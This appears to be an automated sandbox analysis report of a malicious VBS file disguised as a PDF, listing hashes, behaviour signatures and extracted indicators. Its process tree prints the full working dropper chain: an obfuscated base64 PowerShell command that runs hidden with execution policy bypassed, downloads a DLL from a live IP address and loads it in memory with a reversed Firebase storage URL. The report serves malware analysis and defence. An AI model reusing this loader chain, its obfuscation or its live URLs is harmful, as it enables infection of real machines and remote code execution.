Overview

overview

10

Static

static

3

RFAU02GSHK...DF.vbs

windows7-x64

10

RFAU02GSHK...DF.vbs

windows10-2004-x64

10

RV07QAROPH...an.exe

windows7-x64

10

RV07QAROPH...an.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-12-2024 03:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFAU02GSHKOPSFDQW_002_PDF.vbs

  • Size

    222KB

  • MD5

    f212536d8cdf98f7284837ee48886346

  • SHA1

    7fe473d02fe0dc783b6021c792abca338dc4e11f

  • SHA256

    91f8e59475196b2ab33f9e5e22beb04d3ee039985abe1572a4a6e7b3f6f8b74d

  • SHA512

    08524a86d5b9f53953e9587286e7210c48ee403e99c67f13dbdd5081a7d558c58541c4e95b6ca640a98a5e5d8a634127801767655b168fa8889357d3319880c6

  • SSDEEP

    192:Oply3gSajcsbpS1zQ1QXDebjDqNBft1hx8+W6h8VDvwAv1CjIc:ODokghw1HqR98dfH1Cjj

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.106.255.48/dll/TESTING.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFAU02GSHKOPSFDQW_002_PDF.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2848
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC❤Hk❤d❤Bl❤Fs❤XQBd❤C❤❤J❤BE❤Ew❤T❤❤g❤D0❤I❤Bb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QwBv❤G4❤dgBl❤HI❤d❤Bd❤Do❤OgBG❤HI❤bwBt❤EI❤YQBz❤GU❤Ng❤0❤FM❤d❤By❤Gk❤bgBn❤Cg❤K❤BO❤GU❤dw❤t❤E8❤YgBq❤GU❤YwB0❤C❤❤TgBl❤HQ❤LgBX❤GU❤YgBD❤Gw❤aQBl❤G4❤d❤❤p❤C4❤R❤Bv❤Hc❤bgBs❤G8❤YQBk❤FM❤d❤By❤Gk❤bgBn❤Cg❤JwBo❤HQ❤d❤Bw❤Do❤Lw❤v❤DI❤M❤❤u❤DE❤M❤❤2❤C4❤Mg❤1❤DU❤Lg❤0❤Dg❤LwBk❤Gw❤b❤❤v❤FQ❤RQBT❤FQ❤SQBO❤Ec❤LgB0❤Hg❤d❤❤n❤Ck❤KQ❤7❤Fs❤UwB5❤HM❤d❤Bl❤G0❤LgBB❤H❤❤c❤BE❤G8❤bQBh❤Gk❤bgBd❤Do❤OgBD❤HU❤cgBy❤GU❤bgB0❤EQ❤bwBt❤GE❤aQBu❤C4❤T❤Bv❤GE❤Z❤❤o❤CQ❤R❤BM❤Ew❤KQ❤u❤Ec❤ZQB0❤FQ❤eQBw❤GU❤K❤❤n❤EY❤aQBi❤GU❤cg❤u❤Eg❤bwBt❤GU❤Jw❤p❤C4❤RwBl❤HQ❤TQBl❤HQ❤a❤Bv❤GQ❤K❤❤n❤FY❤QQBJ❤Cc❤KQ❤u❤Ek❤bgB2❤G8❤awBl❤Cg❤J❤Bu❤HU❤b❤Bs❤Cw❤I❤Bb❤G8❤YgBq❤GU❤YwB0❤Fs❤XQBd❤C❤❤K❤❤n❤DU❤Mg❤1❤Dk❤M❤Bl❤GI❤Yg❤w❤DI❤NQ❤0❤C0❤O❤❤z❤Dc❤OQ❤t❤DQ❤Yg❤1❤DQ❤LQBi❤Dc❤ZgBl❤C0❤Mw❤x❤GI❤YwBh❤GY❤N❤❤2❤D0❤bgBl❤Gs❤bwB0❤CY❤YQBp❤GQ❤ZQBt❤D0❤d❤Bs❤GE❤PwB0❤Hg❤d❤❤u❤D❤❤MgBB❤FI❤RQ❤v❤G8❤LwBt❤G8❤Yw❤u❤HQ❤bwBw❤HM❤c❤Bw❤GE❤Lg❤w❤Dc❤N❤Bm❤GY❤LQBz❤HI❤LwBi❤C8❤M❤B2❤C8❤bQBv❤GM❤LgBz❤Gk❤c❤Bh❤GU❤b❤Bn❤G8❤bwBn❤C4❤ZQBn❤GE❤cgBv❤HQ❤cwBl❤HM❤YQBi❤GU❤cgBp❤GY❤Lw❤v❤Do❤cwBw❤HQ❤d❤Bo❤Cc❤KQ❤p❤❤==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('❤','A') ) ).replace('%testinmg%','');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.255.48/dll/TESTING.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('52590ebb0254-8379-4b54-b7fe-31bcaf46=nekot&aidem=tla?txt.02ARE/o/moc.topsppa.074ff-sr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2688

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    da8d6c12fda9263b710142c3543e0bc4

    SHA1

    7ea98f73b3c61168f468aabf6ab6f07701d99a16

    SHA256

    b2ffc0d596d560c3b5f0ec599992f7b7f31d98ce54240f0948088b2b2688b76f

    SHA512

    85d221597c18c7198a0a37fa1d9efa3f3b20ee3f19c82e52c341132d1beff1198f0a89080e054790f733a5a77c4e5e9afcadbf984f032e2f5e19700f45e37956

    Download Submit

  • memory/2696-4-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2696-5-0x000000001B730000-0x000000001BA12000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2696-6-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2696-7-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2696-8-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2696-9-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2696-10-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2696-16-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2696-17-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2696-18-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2696-19-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

    Filesize

    9.6MB

    Download